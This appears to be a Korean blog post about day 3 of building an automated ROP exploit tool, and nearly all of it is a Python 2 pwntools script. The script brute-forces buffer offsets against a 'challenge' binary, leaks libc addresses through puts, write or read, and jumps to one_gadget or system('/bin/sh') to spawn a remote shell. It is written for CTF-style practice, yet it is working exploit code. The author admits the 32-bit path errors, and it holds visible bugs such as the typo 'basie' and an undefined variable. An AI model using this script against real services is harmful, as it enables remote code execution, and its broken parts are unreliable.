Auto_rop_개발_3일차

LeeDoHyun · April 12, 2020

그냥 전형정인 ROP만 풀립니다. 아직 32bit 오류터집니당

#!/usr/bin/env python
#-*-coding:utf8-*-
from pwn import *

context.log_level = "debug"
IP = "nc Server IP"
PORT = "nc Server PORT"

print('=================================')
print('Change the binary name to challenge!')
print('example')
print('64bit) puts leak: 1')
print('64bit) libc csu init leak (puts): 2')
print('64bit) libc csu init leak (write): 3')
print('32bit) read leak: 4')
print('=================================')

choice = input('your want exploit shape: ')

def puts_exploit():
	e = ELF("./challenge")
	pop_rdi = input('pop rdi gadget: ')
        ret = input('return address: ')
        puts_plt = e.plt["puts"]
        puts_got = e.got["puts"]
        main = e.symbols["main"]

	print 'remote: 1, local: 2'
	rl = input('remote and local: ')
	if(rl == 1):
		one = input('ubuntu version 16.04 = 1, 18.04 = 2: ')
        	if(one == 1):
                	libc = e.libc
                	one_gadget = 0x4526a
        	elif(one == 2):
                	libc = ELF("libc-2.27.so")
                	one_gadget = 0x4f322

		for i in range(1, 5000):
			r = remote(IP, PORT)
			sleep(0.1)

			payload = "A"*(int(i))
			payload += p64(pop_rdi)
			payload += p64(puts_got)
			payload += p64(puts_plt)
			payload += p64(main)
     			r.sendline(payload)
                        sleep(0.1)

			try:
				puts_leak = u64(r.recvuntil("\x7f")[-6:] + "\x00\x00")
				base = puts_leak - libc.symbols["puts"]
				oneshot = base + one_gadget

				info("buffer size = " + str(i))
       	 			info("puts leak = " + hex(puts_leak))
       	 			info("base addr = " + hex(base))
				info("oneshot addr = " + hex(oneshot))

		        	payload = "B"*(int(i))
				payload += p64(oneshot)
				payload += p64(0) * 10
        			r.sendline(payload)
        			r.interactive()
				break
			except:
				print ("Fail: " + str(i))
			r.close()

	elif(rl == 2):
        	one = input('ubuntu version 16.04 = 1, 18.04 = 2: ')
        	if(one == 1):
                	libc = e.libc
                	one_gadget = 0x4526a
        	elif(one == 2):
                	libc = ELF("libc-2.27.so")
                	one_gadget = 0x4f322

                for i in range(1, 5000):
                        r = process("./challenge")
			sleep(0.1)

                        payload = "A"*(int(i))
                        payload += p64(pop_rdi)
                        payload += p64(puts_got)
                        payload += p64(puts_plt)
                        payload += p64(main)
                        r.sendline(payload)
                        sleep(0.1)

                        try:
                                puts_leak = u64(r.recvuntil("\x7f")[-6:] + "\x00\x00")
                                base = puts_leak - libc.symbols["puts"]
                                oneshot = base + one_gadget

                                info("buffer size = " + str(i))
                                info("puts leak = " + hex(puts_leak))
                                info("base addr = " + hex(base))
                                info("oneshot addr = " + hex(oneshot))

                                payload = "B"*(int(i))
                                payload += p64(oneshot)
                                payload += p64(0) * 10
                                r.sendline(payload)
                                r.interactive()
                                break
                        except:
                                print ("Fail: " + str(i))
                        r.close()
	else:
		print "No"
		exit()

def puts_csu_exploit():
	e = ELF("./challenge")
	__libc_csu_init_gadget1 = input('__libc_csu_init gadget 1: ')
	__libc_csu_init_gadget2 = input('__libc_csu_init gadget 2: ')
	puts_got = e.got["puts"]
	bss = e.bss()
	main = e.symbols["main"]

	print 'remote: 1, local: 2'
        rl = input('remote and local: ')

	if(rl == 1):
		one = input('ubuntu version 16.04 = 1, 18.04 = 2: ')
       		if(one == 1):
        		libc = e.libc
                	one_gadget = 0x4526a
        	elif(one == 2):
                	libc = ELF("libc-2.27.so")
                	one_gadget = 0x4f322

	        for i in range(1, 5000):
        	        r = remote(IP, PORT)
			sleep(0.1)

        	        payload = "A"*(int(i))
			payload += p64(__libc_csu_init_gadget1)
			payload += p64(0)
			payload += p64(1)
			payload += p64(puts_got)
			payload += p64(0)
			payload += p64(0)
			payload += p64(puts_got)

			payload += p64(__libc_csu_init_gadget2)
			payload += p64(0) * 7
			payload += p64(main)
			r.sendline(payload)
                        sleep(0.1)

			try:
       	         		puts_leak = u64(r.recvuntil("\x7f")[-6:] + "\x00\x00")
       	                	base = puts_leak - libc.symbols["puts"]
                        	oneshot = base + one_gadget

                        	info("buffer size = " + str(i))
                        	info("puts leak = " + hex(puts_leak))
                        	info("base addr = " + hex(base))
                        	info("oneshot addr = " + hex(oneshot))

                        	payload = "B"*(int(i))
                        	payload += p64(oneshot)
                        	payload += p64(0) * 10
                        	r.sendline(payload)
                       		r.interactive()
                        	break
			except:
                        	print ("Fail: " + str(i))
                	r.close()

	elif(rl == 2):
                one = input('ubuntu version 16.04 = 1, 18.04 = 2: ')
                if(one == 1):
                        libc = e.libc
                        one_gadget = 0x4526a
                elif(one == 2):
                        libc = ELF("libc-2.27.so")
                        one_gadget = 0x4f322

                for i in range(1, 5000):
                        r = process("./challenge")
			sleep(0.1)

                        payload = "A"*(int(i))
                        payload += p64(__libc_csu_init_gadget1)
                        payload += p64(0)
                        payload += p64(1)
                        payload += p64(puts_got)
                        payload += p64(0)
                        payload += p64(0)
                        payload += p64(puts_got)

                        payload += p64(__libc_csu_init_gadget2)
                        payload += p64(0) * 7
                        payload += p64(main)
                        r.sendline(payload)
                        sleep(0.1)

                        try:
                                puts_leak = u64(r.recvuntil("\x7f")[-6:] + "\x00\x00")
                                base = puts_leak - libc.symbols["puts"]
                                oneshot = base + one_gadget

                                info("buffer size = " + str(i))
                                info("puts leak = " + hex(puts_leak))
                                info("base addr = " + hex(base))
                                info("oneshot addr = " + hex(oneshot))

                                payload = "B"*(int(i))
                                payload += p64(oneshot)
                                payload += p64(0) * 10
                                r.sendline(payload)
                                r.sendline(payload)
                                r.interactive()
                                break
                        except:
                                print ("Fail: " + str(i))
                        r.close()
	else:
		print "No"
		exit()

def write_csu_exploit():
	e = ELF("./challenge")
	__libc_csu_init_gadget1 = input('__libc_csu_init gadget 1: ')
	__libc_csu_init_gadget2 = input('__libc_csu_init gadget 2: ')
	write_got = e.got["write"]
	bss = e.bss()
	main = e.symbols["main"]

	print 'remote: 1, local: 2'
        rl = input('remote and local: ')

	if(rl == 1):
		one = input('ubuntu version 16.04 = 1, 18.04 = 2: ')
       		if(one == 1):
        		libc = e.libc
                	one_gadget = 0x4526a
        	elif(one == 2):
                	libc = ELF("libc-2.27.so")
                	one_gadget = 0x4f322

	        for i in range(1, 5000):
        	        r = remote(IP, PORT)
			sleep(0.1)

                        payload = "A"*(int(i))
			payload += p64(__libc_csu_init_gadget1)
			payload += p64(0)
			payload += p64(1)
			payload += p64(write_got)
			payload += p64(8)
			payload += p64(write_got)
			payload += p64(1)

			payload += p64(__libc_csu_init_gadget2)
			payload += p64(0) * 7
			payload += p64(main)
			r.sendline(payload)
                        sleep(0.1)

			try:
       	         		write_leak = u64(r.recvuntil("\x7f")[-6:] + "\x00\x00")
       	                	base = write_leak - libc.symbols["write"]
                        	oneshot = base + one_gadget

                        	info("buffer size = " + str(i))
                        	info("write leak = " + hex(write_leak))
                        	info("base addr = " + hex(base))
                        	info("oneshot addr = " + hex(oneshot))

                        	payload = "B"*(int(i))
                        	payload += p64(oneshot)
                        	payload += p64(0) * 10
                        	r.sendline(payload)
                       		r.interactive()
                        	break
			except:
                        	print ("Fail: " + str(i))
                	r.close()

	elif(rl == 2):
		one = input('ubuntu version 16.04 = 1, 18.04 = 2: ')
       		if(one == 1):
        		libc = e.libc
                	one_gadget = 0x4526a
        	elif(one == 2):
                	libc = ELF("libc-2.27.so")
                	one_gadget = 0x4f322

	        for i in range(1, 500):
        	        r = process("./challenge")
			sleep(0.1)

                        payload = "A"*(int(i))
                        payload += p64(__libc_csu_init_gadget1)
                        payload += p64(0)
                        payload += p64(1)
                        payload += p64(write_got)
                        payload += p64(8)
                        payload += p64(write_got)
                        payload += p64(1)

                        payload += p64(__libc_csu_init_gadget2)
                        payload += p64(0) * 7
                        payload += p64(main)
                        r.sendline(payload)
                        sleep(0.1)

                        try:
                                write_leak = u64(r.recvuntil("\x7f")[-6:] + "\x00\x00")
                                base = write_leak - libc.symbols["write"]
                                oneshot = base + one_gadget

                                info("buffer size = " + str(i))
                                info("write leak = " + hex(write_leak))
                                info("base addr = " + hex(base))
                                info("oneshot addr = " + hex(oneshot))

                                payload = "B"*(int(i))
                                payload += p64(oneshot)
                                payload += p64(0) * 10
                                r.sendline(payload)
                                r.interactive()
                                break
                        except:
                                print ("Fail: " + str(i))
                        r.close()
        else:
                print "No"
                exit()

def read_write_exploit():
	e = ELF("./challenge")
	pppr = input("pppr gadget: ")
	write_plt = e.plt["write"]
	read_plt = e.plt["read"]
	read_got = e.got["read"]
	bss = e.bss()
	binsh = "/bin/sh\x00"

	print 'remote: 1, local: 2'
	rl = input('remote and local: ')
	if(rl == 1):
		one = input('ubuntu version 16.04 = 1, 18.04 = 2: ')
        	if(one == 1):
                	libc = e.libc
                	one_gadget = 0x4526a
        	elif(one == 2):
                	libc = ELF("libc-2.27.so")
                	one_gadget = 0x4f322

		for i in range(1, 5000):
			r = remote(IP, PORT)
			sleep(0.1)

			payload = "A"*(int(i))
			payload += p32(write_plt)
			payload += p32(pppr)
			payload += p32(1)
			payload += p32(read_got)
			payload += p32(4)

			payload += p32(read_plt)
			payload += p32(pppr)
			payload += p32(0)
			payload += p32(bss)
			payload += p32(len(binsh))

			payload += p32(read_plt)
			payload += p32(pppr)
			payload += p32(0)
			payload += p32(read_got)
			payload += p32(4)

			payload += p32(read_plt)
			payload += p32(0)
			payload += p32(bss)
			r.sendline(payload)
			sleep(0.1)

			try:
				read_leak = u32(r.recv(4))
				base = read_leak - libc.symbols["read"]
				system = basie + libc.symbols["system"]

				info("buffer size = " + str(i))
       	 			info("puts leak = " + hex(puts_leak))
       	 			info("base addr = " + hex(base))
				info("system addr = " + hex(system))

		        	payload = binsh
				payload += p32(system)
        			r.sendline(payload)
        			r.interactive()
				break
			except:
				print ("Fail: " + str(i))
			r.close()

	elif(rl == 2):
                one = input('ubuntu version 16.04 = 1, 18.04 = 2: ')
                if(one == 1):
                        libc = e.libc
                        one_gadget = 0x4526a
                elif(one == 2):
                        libc = ELF("libc-2.27.so")
                        one_gadget = 0x4f322

                for i in range(1, 5000):
                        r = process("./challenge")
                        sleep(0.1)

                        payload = "A"*(int(i))
                        payload += p32(write_plt)
                        payload += p32(pppr)
                        payload += p32(1)
                        payload += p32(read_got)
                        payload += p32(4)

                        payload += p32(read_plt)
                        payload += p32(pppr)
                        payload += p32(0)
                        payload += p32(bss)
                        payload += p32(len(binsh))

                        payload += p32(read_plt)
                        payload += p32(pppr)
                        payload += p32(0)
                        payload += p32(read_got)
                        payload += p32(4)

                        payload += p32(read_plt)
                        payload += p32(0)
                        payload += p32(bss)
                        r.sendline(payload)
                        sleep(0.1)

                        try:
                                read_leak = u32(r.recv(4))
                                base = read_leak - libc.symbols["read"]
                                system = base + libc.symbols["system"]

                                info("buffer size = " + str(i))
                                info("puts leak = " + hex(puts_leak))
                                info("base addr = " + hex(base))
                                info("system addr = " + hex(system))

                                payload = binsh
                                payload += p32(system)
                                r.sendline(payload)
                                r.interactive()
                                break
                        except:
                                print ("Fail: " + str(i))
                        r.close()
	else:
		print "No"
		exit()

if(choice == 1):
	puts_exploit()
elif(choice == 2):
	puts_csu_exploit()
elif(choice == 3):
	write_csu_exploit()
elif(choice == 4):
	read_write_exploit()
else:
	exit()

Twitter, Facebook